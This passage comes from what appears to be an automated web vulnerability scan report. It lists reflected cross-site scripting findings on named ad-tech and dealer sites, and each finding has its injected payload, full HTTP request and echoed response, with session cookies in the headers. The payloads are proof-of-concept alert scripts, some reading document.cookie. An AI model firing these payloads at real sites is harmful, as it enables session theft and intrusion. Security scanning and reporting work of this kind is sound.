The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 2bbdc<script>alert(1)</script>53129e2fbb3 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=2bbdc<script>alert(1)</script>53129e2fbb3&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:14 GMT
Date: Sat, 16 Apr 2011 13:51:14 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ength-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"2bbdc<script>alert(1)</script>53129e2fbb3", c10:"", c15:"", c16:"", r:""});



4.26. http://cas.ny.us.criteo.com/delivery/afr.php [did parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cas.ny.us.criteo.com
Path:   /delivery/afr.php

Issue detail

The value of the did request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f81e5'style%3d'x%3aexpression(alert(1))'7563c489890 was submitted in the did parameter. This input was echoed as f81e5'style='x:expression(alert(1))'7563c489890 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /delivery/afr.php?zoneid=15066&bannerid=37112&did=156505f45df81e5'style%3d'x%3aexpression(alert(1))'7563c489890&rtb=5&z=Tar60gAHR30K5X_Nloo_2GL3qxoxX1hsFewpCw&b=_9%252f8RilNQuVmVpyvNO2WVQg%253d%253d&u=|QmCyCf/O7hL8fisSJvUOqKLBu3umSoU3sekQ5udTqrY=|&bi=|QmCyCf/O7hJlodhOLNsrwMA/kTEKxx+G6iE3+w8k9mtjbRxt/u2NAg==|&rl=~02-DC9C20D512FA751C4712D31356EF1781B34849CF-a-q-c-103--2-1-~&ep=%7cQmCyCf%2fO7hKYMkLPH4Veoi9%2bda57p3x3sVmFbD27DgeErQnbGjoFg9GtCrd0q81l%7c&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB5eg20vqqTf2OHc3_lQfY_6i0CaKBnoQCoqHByxOShdTVSQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MzE1NTc4NDYwMjUxNDIzoAGs3f7oA7IBEHd3dy5oYWJlci5nZW4udHK6AQozMDB4MjUwX2FzyAEJ2gFdaHR0cDovL3d3dy5oYWJlci5nZW4udHIvZWRpdGFjN2ZkJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoJTIySURJT1QlMjIpJTNDL3NjcmlwdCUzRTA1NTA0MTUzNzdimAL6FcACBcgCrMKrDqgDAfUDAAAAxIAGuoH4hfPs5YdV%26num%3D1%26sig%3DAGiWqtzGyfAoAR666KFrrSATBBfN92A9aw%26client%3Dca-pub-5315578460251423%26adurl%3D&prlog= HTTP/1.1
Host: cas.ny.us.criteo.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5315578460251423&format=300x250_as&output=html&h=250&w=300&lmt=1303068963&channel=2159340635&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fwww.haber.gen.tr%2Fincludes_yeni%2Fmynet3.htm&color_bg=FBFBFB&color_border=FFFFFF&color_link=45546B&color_text=000000&color_url=7CA415&flash=10.2.154&url=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert(%2522IDIOT%2522)%253C%2Fscript%253E0550415377b&dt=1303050963570&bpp=1&shv=r20110406&jsv=r20110412&prev_fmts=300x250_as&prev_slotnames=8756608441&correlator=1303050928025&frm=0&adk=3471477028&ga_vid=1891209206.1303050928&ga_sid=1303050928&ga_hid=1373877376&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=973&eid=33895132&ref=http%3A%2F%2Fburp%2Fshow%2F40&fu=0&ifi=3&dtd=161&xpc=f3SeV9FlEk&p=http%3A//www.haber.gen.tr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=ce48fc77-7599-4968-ae07-b1daf0463305; udc=*1PvotshjACjE74y20GwJvMA%3d%3d; udi=*15Fg%2b59W72YO0jpuTCiAJmQ%3d%3d; evt=*1YsJhcuZCSxoABQmXXWsOhR6uR3kIaBebvD6nwBJjjMY%3d; uic=*13H%2bAu%2bmG%2bChk8ggPbwnxkrQQ8Z17refXkYQu8eEU0fjeU%2fwLAHgNvhAiUG5QHNRj; dis=*12VWxXL1XaY1S9qvptFGQ7eAFRgw3i%2f%2bqtoIw3HzTj6ZMNuZlx6reINde4n7jPnAtZHWPtxCQPit16SZIkJNjGbu3LVUe3SUbdPsTn810eu5Eg1Rr1SF2zO9v%2bIakpFEkr%2bPx0gATCXaWun21B3PL5FeHd%2fxvSWhFldH0vbsgy%2fjKLco2gd2a5xR193L12noCPAD7a1A1WCUXWB5MnqCocdHz1zFhXaIYlFa%2feL8MeiewBP8i72W2Smo0B7dbOvaj4YQIwkmx%2bhWQJmM6a61%2f6P4XxxBbQzGrV4lLZk%2b0CXo8UaasIzysyNgVO5K%2fiDY29YyWJ%2ffsAElIhASNXkl7UXX6WTF11Uq9Y8kPvtt9giDoeJ%2bU90ABpHszulWVQwQ30hSjgW%2fh8kliCaB0pN58UTJ8qtpgQQmEc6kDASwS7xhIPYqdwcb%2fRd5FyC2pFqEy

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private, max-age=0, no-cache
Content-Type: text/html; charset=utf-8
P3P: CP='CUR ADM OUR NOR STA NID'
Date: Sun, 17 Apr 2011 14:36:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: OAID=ce48fc7775994968ae07b1daf0463305; expires=Sun, 17-Apr-2016 14:36:10 GMT; path=/
Set-Cookie: udc=*13TYb407Nzn0ZH0Euz4UNtr9IsYUzbQITxUUULDLNmxZrzU%2fJ4gv%2fKlT6SKc05zuUvATSRvsw4b7TlyeQBoz1tuInb68k5ZYQ6P%2bZbSbdMTnMpG%2fUUAYABL%2fOjZdgNl%2fj1yYrlvJzVkyoSKgWFtCs4Dqpt7mJOo%2bqs5KBIyVS26c7WVJ1y6uhRTIzTLdaqwKgd6OY2P6jSrkZKY7xviAYiVuQbaKa3mvNqVmNBYtOh5wBJaP%2b2FWIxhj6mVOaLreP2ofbbEBmTXdBAofksnjZWg7eVzZOcKd%2b7sKZ4Lz8bKYP%2f3RTv3U2R3pumJE60%2bcg8ZdcXlBIGSJbKkjyIqjViftjM42kg1KotFLgmAlwmdXyxuOu4bd3QN92nCjulqUAdmotUPcIM7JdWjAC8mGD%2fCgK8XXhL4%2bdYF9kZnZw%2b0iSqbOhighXQzAcefoRjVZRlnkIUaGtVBaFMoR1r0lgyoDGgQzyRV%2b8Zs7N2l6KYNWfvAm3QPVWxio%2fzk2GdVdQ6qKA42XdYzPYY4iOYegdExE4%2bL0GiQKg%2bqbdrJufvWfj1xwnbX%2fMnTQmFyn3zUqhThDF9wGbiiDmWlXdZZYABw%3d%3d; domain=.criteo.com; expires=Mon, 17-Oct-2011 14:36:10 GMT; path=/
Set-Cookie: udi=*1kLYehFfAa6GMU2HG2byvAQ%3d%3d; domain=.criteo.com; expires=Mon, 18-Apr-2011 14:36:10 GMT; path=/
Set-Cookie: OACBLOCK=; expires=Tue, 17-May-2011 14:36:10 GMT; path=/
Set-Cookie: OACCAP=; expires=Tue, 17-May-2011 14:36:10 GMT; path=/
Set-Cookie: OASCCAP=; path=/
Content-Length: 6109

<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<div
...[SNIP]...
<iframe id='if156505f45df81e5'style='x:expression(alert(1))'7563c489890' name='if156505f45df81e5'style='x:expression(alert(1))'7563c489890' width='1px' height='1px'>
...[SNIP]...

4.27. https://cc.dealer.com/views/forgot-password [reseller parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/forgot-password

Issue detail

The value of the reseller request parameter is copied into the HTML document as plain text between tags. The payload dd839<script>alert(1)</script>5d9f0f94bb2 was submitted in the reseller parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/forgot-password?reseller=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000145)%3C/script%3Edd839<script>alert(1)</script>5d9f0f94bb2&lang=en_US HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; ssoid=6124c450404638d30061b29f82e6d54d; JSESSIONID=giphhm46cleri

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:29:56 GMT
Connection: keep-alive
Set-Cookie: ssoid=6370550540463812016995a2e0336b5c;path=/;domain=.dealer.com
Cache-Control: must-revalidate
Expires: Wed, 04 Dec 1996 21:29:02 GMT
Pragma: no-cache
Content-Length: 4059

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
   <title>Dealer.com Forgot Username/Password</title>

<style type="text/css">
   body{
       margin:0;
       padding:0;
       over
...[SNIP]...
</script>dd839<script>alert(1)</script>5d9f0f94bb2/login_graphic.png?0) no-repeat;
    width: 489px;
    height: 330px;
   }

   * html #loginBox{
       padding-top: 80px;
       padding-left: 0px;
   }

   #loginBox table {
       padding-left: 50px;
       padding-right: 65
...[SNIP]...

4.28. https://cc.dealer.com/views/forgot-password [reseller parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/forgot-password

Issue detail

The value of the reseller request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 539c4"><script>alert(1)</script>aad2fd6705e was submitted in the reseller parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/forgot-password?reseller=539c4"><script>alert(1)</script>aad2fd6705e&lang=en_US HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; ssoid=6124c450404638d30061b29f82e6d54d; JSESSIONID=giphhm46cleri

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:29:54 GMT
Connection: keep-alive
Set-Cookie: ssoid=63704c0b40463812016995a2a1a75473;path=/;domain=.dealer.com
Cache-Control: must-revalidate
Expires: Wed, 04 Dec 1996 21:29:02 GMT
Pragma: no-cache
Content-Length: 3955

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
   <title>Dealer.com Forgot Username/Password</title>

<style type="text/css">
   body{
       margin:0;
       padding:0;
       over
...[SNIP]...
<a href="/views/login?reseller=539c4"><script>alert(1)</script>aad2fd6705e" border="0">
...[SNIP]...

4.29. http://display.digitalriver.com/ [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84deb'-alert(1)-'cf4a7bdb388 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aid=24484deb'-alert(1)-'cf4a7bdb388&tax=trend_micro HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:56:47 GMT
Server: Apache/2.2.9
Expires: Sun, 17 Apr 2011 13:26:47 GMT
Last-Modified: Sun, 17 Apr 2011 12:56:47 GMT
Content-Length: 234
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=24484deb'-alert(1)-'cf4a7bdb388&tax=trend_micro';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.30. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfcd5'-alert(1)-'d944e6c89e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aid=244&tax=trend_micro&dfcd5'-alert(1)-'d944e6c89e=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:56:48 GMT
Server: Apache/2.2.9
Expires: Sun, 17 Apr 2011 13:26:48 GMT
Last-Modified: Sun, 17 Apr 2011 12:56:48 GMT
Content-Length: 236
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro&dfcd5'-alert(1)-'d944e6c89e=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.31. http://display.digitalriver.com/ [tax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43d5f'-alert(1)-'d2ee4501071 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aid=244&tax=trend_micro43d5f'-alert(1)-'d2ee4501071 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:56:48 GMT
Server: Apache/2.2.9
Expires: Sun, 17 Apr 2011 13:26:48 GMT
Last-Modified: Sun, 17 Apr 2011 12:56:48 GMT
Content-Length: 234
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro43d5f'-alert(1)-'d2ee4501071';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.32. http://ds.addthis.com/red/psi/sites/www.staysafeonline.org/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.staysafeonline.org/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ad9dc<script>alert(1)</script>c211f103512 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.staysafeonline.org/p.json?callback=_ate.ad.hprad9dc<script>alert(1)</script>c211f103512&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.staysafeonline.org%2Fcontact&ref=http%3A%2F%2Fwww.staysafeonline.org%2F&xls06r HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1302905826.1FE|1302905826.60|1302905826.66; dt=X; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 451
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 17 Apr 2011 12:53:49 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 17 May 2011 12:53:49 GMT; Path=/
Set-Cookie: di=%7B%7D..1303044829.1FE|1303044829.60|1303044829.66; Domain=.addthis.com; Expires=Tue, 16-Apr-2013 12:53:48 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 17 Apr 2011 12:53:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 17 Apr 2011 12:53:49 GMT
Connection: close

_ate.ad.hprad9dc<script>alert(1)</script>c211f103512({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d97b40ad252fd37","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2fwww.staysaf
...[SNIP]...

4.33. http://ds.addthis.com/red/psi/sites/www.webroot.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.webroot.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 41b69<script>alert(1)</script>b9cd18d7e21 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.webroot.com/p.json?callback=_ate.ad.hpr41b69<script>alert(1)</script>b9cd18d7e21&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fbusiness-antispyware-ce.html&ref=http%3A%2F%2Fburp%2Fshow%2F26&1vvglw8 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1303044828.1FE|1303044828.60|1303044865.66; dt=X; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 17 Apr 2011 13:20:04 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 17 May 2011 13:20:04 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 17 Apr 2011 13:20:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 17 Apr 2011 13:20:04 GMT
Connection: close

_ate.ad.hpr41b69<script>alert(1)</script>b9cd18d7e21({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

4.34. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 9776c<script>alert(1)</script>af634ea0b3b was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.martindale.com%2Fall%2Fc-england%2Fall-lawyers-3.htm%3Fc%3DN&uid=ZC45X9Axu6NOUFfX_3216119776c<script>alert(1)</script>af634ea0b3b&xy=0%2C0&wh=160%2C600&vchannel=76289&cid=151354&iad=1302961744905-1937990565784275&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=3737712935544550400?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=f316e322-42df-4ab5-ad2c-53028d5d34aa

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=ABA01A6D8C5302184EC9B5B48A58FCC8; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Sat, 16 Apr 2011 13:49:37 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_3216119776c<script>alert(1)</script>af634ea0b3b");

4.35. http://feeds.feedburner.com/~s/hadash-hot [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.feedburner.com
Path:   /~s/hadash-hot

Issue detail

The value of the i request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba601"%3balert(1)//a740d68a772 was submitted in the i parameter. This input was echoed as ba601";alert(1)//a740d68a772 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~s/hadash-hot?i=http://www.hadash-hot.co.il/login.php?return=/submit.php?69123ba601"%3balert(1)//a740d68a772 HTTP/1.1
Host: feeds.feedburner.com
Proxy-Connection: keep-alive
Referer: http://www.hadash-hot.co.il/login.php?return=/submit.php?69123%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efab6770260=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=UTF-8
Date: Sun, 17 Apr 2011 14:35:06 GMT
Expires: Sun, 17 Apr 2011 14:35:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 743

var fStartPost=1;if(window.feedburner_currPost!=null){window.feedburner_currPost++}else{window.feedburner_currPost=1}if(document.body.getAttribute("fStartPost")){fs=parseInt(document.body.getAttribute
...[SNIP]...
ner_startPostOverride=fStartPost}if(window.feedburner_currPost==fStartPost){feedSrc='http://feeds.feedburner.com/~s/hadash-hot?i='+escape("http://www.hadash-hot.co.il/login.php?return=/submit.php?69123ba601";alert(1)//a740d68a772")+'&showad=true';document.write('<script src="'+feedSrc+'" type="text/javascript">
...[SNIP]...

4.36. http://googlev8.dealer.com/smgmap.htm [locale parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://googlev8.dealer.com
Path:   /smgmap.htm

Issue detail

The value of the locale request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 230ed"><script>alert(1)</script>8066f9184f8 was submitted in the locale parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smgmap.htm?accountId=automastermercedesbenz&locale=en_US230ed"><script>alert(1)</script>8066f9184f8 HTTP/1.1
Host: googlev8.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/dealership/about.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:16:00 GMT
Connection: close
Set-Cookie: ssoid=5f5015bb0a0a0003004764a11aea3255;path=/;domain=.dealer.com
Set-Cookie: ddcpoolid=CmsPoolGoogleV8;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2962

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms19.dealer.ddc p7072 -->

   <title>Google Maps</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...
<body class="honda enUS230ed"><script>alert(1)</script>8066f9184f8">
...[SNIP]...

4.37. http://googlev8.dealer.com/smgmap.htm [locale parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://googlev8.dealer.com
Path:   /smgmap.htm

Issue detail

